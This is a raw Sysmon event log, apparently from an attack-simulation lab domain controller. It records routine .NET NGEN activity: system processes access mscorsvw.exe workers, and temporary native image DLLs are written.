13:51:15.913{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9253-6005-7004-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:15.788{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9253-6005-6F04-00000000A301}1752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008701Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:15.772{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9253-6005-6F04-00000000A301}1752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008700Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:15.772{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9253-6005-6F04-00000000A301}1752C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008699Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:15.694{59A5CD1D-9252-6005-6E04-00000000A301}4580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11e4-0\System.ServiceModel.Web.dll2021-01-18 13:51:15.679 10341000x80000000000000008709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:16.835{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9254-6005-7104-00000000A301}2872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:16.819{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9254-6005-7104-00000000A301}2872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:16.819{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9254-6005-7104-00000000A301}2872C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:16.726{59A5CD1D-9253-6005-7004-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\f4c-0\System.Speech.dll2021-01-18 13:51:16.726 10341000x80000000000000008715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:17.366{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:17.366{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:17.366{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:17.085{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9255-6005-7204-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:17.069{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9255-6005-7204-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:17.069{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9255-6005-7204-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 11241100x80000000000000008716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 
13:51:22.928{59A5CD1D-9255-6005-7204-00000000A301}4900C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1324-0\System.Web.dll2021-01-18 13:51:22.928 10341000x80000000000000008736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.897{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925B-6005-7804-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.897{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-925B-6005-7804-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:23.897{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925B-6005-7804-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:23.678{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925B-6005-7704-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.678{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-925B-6005-7704-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008731Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:23.678{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925B-6005-7704-00000000A301}4916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:23.616{59A5CD1D-925B-6005-7604-00000000A301}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1318-0\System.Web.ApplicationServices.dll2021-01-18 13:51:23.616 10341000x80000000000000008729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:23.569{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-925B-6005-7604-00000000A301}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:23.553{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-925B-6005-7604-00000000A301}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:51:23.553{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-925B-6005-7604-00000000A301}4888C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
